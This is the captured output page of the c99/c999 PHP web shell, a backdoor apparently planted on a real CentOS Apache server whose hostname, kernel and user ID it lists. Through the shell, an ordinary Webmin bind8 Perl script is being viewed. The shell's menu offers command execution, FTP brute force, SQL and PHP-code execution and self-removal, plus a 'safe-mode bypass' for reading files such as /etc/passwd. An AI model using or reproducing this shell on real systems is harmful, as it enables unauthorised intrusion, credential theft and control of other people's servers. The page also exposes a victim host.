!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     free_chooser.cgi (1.77 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a list of free IP addresses, within the configured ranges

require './bind8-lib.pl';

# Go through all zones to find IPs in use, and networks
$conf = &get_config();
@views = &find("view", $conf);
foreach $v (@views) {
    @vz = &find("zone", $v->{'members'});
    map { $view{$_} = $v } @vz;
    push(@zones, @vz);
    }
push(@zones, &find("zone", $conf));
foreach $z (@zones) {
    $type = &find_value("type", $z->{'members'});
    next if ($type ne "master");
    $file = &find_value("file", $z->{'members'});
    @recs = &read_zone_file($file, $z->{'value'});
    foreach $r (@recs) {
        if ($r->{'type'} eq 'A') {
            $taken{$r->{'values'}->[0]}++;
            $net = $r->{'values'}->[0];
            $net =~ s/\d+$/0/;
            if ($net ne "127.0.0.0") {
                $nets{$net}++;
                }
            }
        elsif ($r->{'type'} eq 'PTR') {
            $taken{&arpa_to_ip($r->{'values'}->[0])}++;
            }
        }
    }

# Use configured networks, if any
if ($config{'free_nets'}) {
    @nets = split(/\s+/, $config{'free_nets'});
    }
else {
    @nets = keys %nets;
    }
@nets = sort { $a cmp $b } @nets;

# display list of free IPs in the nets
&popup_header($text{'free_title'});
print "<script>\n";
print "function select(f)\n";
print "{\n";
print "top.opener.ifield.value = f;\n";
print "top.close();\n";
print "return false;\n";
print "}\n";
print "</script>\n";
print &ui_columns_start([ $text{'free_ip'} ], 100);
foreach $net (@nets) {
    @netip = split(/\./, $net);
    if ($netip[3] eq "0") {
        $start = 1;
        $end = 255;
        }
    elsif ($netip[3] =~ /^(\d+)\-(\d+)$/) {
        $start = $1;
        $end = $2;
        }
    else {
        $start = $end = $netip[3];
        }
    for($d=$start; $d<=$end; $d++) {
        $ip = "$netip[0].$netip[1].$netip[2].$d";
        if (!$taken{$ip}) {
            print &ui_columns_row([ "<a href=\"\" onClick='return select(\"$ip\")'>$ip</a>" ]);
            }
        }
    }
print &ui_columns_end();
&popup_footer();


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--